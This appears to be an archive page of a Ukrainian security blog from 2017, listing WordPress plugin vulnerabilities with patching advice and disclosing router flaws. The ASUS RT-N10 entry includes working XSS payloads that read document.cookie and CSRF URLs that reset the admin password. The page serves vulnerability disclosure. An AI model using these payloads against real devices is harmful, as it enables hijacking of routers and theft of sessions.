Архів для категорії 'Уразливості'

Уразливості в плагінах для WordPress №261

23:55 22.07.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Contact Form To DB, Donate, Facebook Like Button, Sender, PDF And Print. Для котрих з’явилися експлоіти.

  • WordPress Contact Form To DB 1.4.0 Cross Site Scripting (деталі)
  • WordPress Donate 2.0.1 Cross Site Scripting (деталі)
  • WordPress Facebook Like Button 2.32 Cross Site Scripting (деталі)
  • WordPress Sender 0.7 Cross Site Request Forgery (деталі)
  • WordPress PDF And Print 1.7.4 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості в плагінах для WordPress №260

23:51 20.07.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Google Sitemap, Htaccess, Job Board, Limit Attempts. Для котрих з’явилися експлоіти.

  • WordPress Google Sitemap 2.9.1 Cross Site Scripting (деталі)
  • WordPress Htaccess 1.4 Cross Site Scripting (деталі)
  • WordPress Job Board 1.0.0 Cross Site Scripting (деталі)
  • WordPress Limit Attempts 1.0.3 Cross Site Request Forgery (деталі)
  • WordPress Limit Attempts 1.0.3 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:29 20.07.2017

В даній добірці уразливості в веб додатках:

  • HP Network Node Manager I (NNMi) for Windows and Linux, Remote Execution of Arbitrary Code (деталі)
  • Ektron CMS 9.10 SP1 - CSRF Vulnerability (деталі)
  • Ektron CMS 9.10 SP1 - XSS Vulnerability (деталі)
  • Local PHP File Inclusion in ResourceSpace (деталі)
  • procmail vulnerability (деталі)

Добірка уразливостей

18:22 18.07.2017

В даній добірці уразливості в веб додатках:

Уразливості в плагінах для WordPress №259

23:58 01.07.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Gallery, Google Captcha, Email Queue, BestWebSoft Google Maps, Google +1. Для котрих з’явилися експлоіти.

  • WordPress Gallery 4.2.1 Cross Site Scripting (деталі)
  • WordPress Google Captcha 1.05 Cross Site Scripting (деталі)
  • WordPress Email Queue 1.0.0 Cross Site Request Forgery (деталі)
  • WordPress BestWebSoft Google Maps 1.2.1 Cross Site Scripting (деталі)
  • WordPress Google +1 1.1.6 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості в плагінах для WordPress №258

23:59 29.06.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Tierra Billboard Manager, NextGEN Gallery, Contact Form, Simple Booking Calendar, Captcha. Для котрих з’явилися експлоіти.

  • WordPress Tierra Billboard Manager 1.14 SQL Injection (деталі)
  • WordPress NextGEN Gallery 2.0.66.16 Cross Site Scripting (деталі)
  • WordPress Contact Form 3.81 Cross Site Scripting (деталі)
  • WordPress Simple Booking Calendar 1.3 Cross Site Request Forgery (деталі)
  • WordPress Captcha 4.0.2 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:20 29.06.2017

В даній добірці уразливості в веб додатках:

Уразливості в плагінах для WordPress №257

23:59 24.06.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах S3 Video, Admin Management Xtended, Symposium і темі Squirrel. Для котрих з’явилися експлоіти.

  • WordPress Squirrel Theme 1.6.4 Remote File Inclusion (деталі)
  • WordPress S3 Video Remote Shell Upload (деталі)
  • WordPress Admin Management Xtended 2.4.0 Privilege Escalation (деталі)
  • WordPress Symposium 14.05.02 Cross Site Request Forgery (деталі)
  • WordPress Symposium 14.05.02 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

XSS та CSRF уразливості в ASUS RT-N10

16:25 24.06.2017

27.05.2016

У листопаді, 30.11.2015, я виявив Cross-Site Scripting та Cross-Site Request Forgery уразливості в ASUS Wireless Router RT-N10. А також в його модифікаціях RT-N10E, RT-N10LX і RT-N10U. Це друга частина дірок в RT-N10.

Раніше я писав про уразливості ASUS RT-N10.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

24.06.2017

Cross-Site Scripting (WASC-08):

http://site/apply.cgi?current_page=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E
http://site/apply.cgi?next_host=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E

Cross-Site Request Forgery (WASC-09):

Зміна паролю адміна:

http://site/apply.cgi?action_mode=+Save+&next_page=SaveRestart.asp&sid_list=General%3B&http_passwd=admin&v_password=admin&action=Save
http://site/apply.cgi?action_mode=Save%26Restart+&next_page=Restarting.asp&sid_list=General%3B&action=Save%26Restart

Уразливі всі версії ASUS RT-N10. Перевірялося в прошивці v.1.9.2.7.

XSS та CSRF уразливості в Transcend Wi-Fi SD Card

23:54 23.06.2017

У травні, 10.05.2014, я знайшов Cross-Site Scripting та Cross-Site Request Forgery уразливості в Transcend Wi-Fi SD Card. Це флешка з бездротовим доступом.

Раніше я писав про уразливості в Transcend Wi-Fi SD Card.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.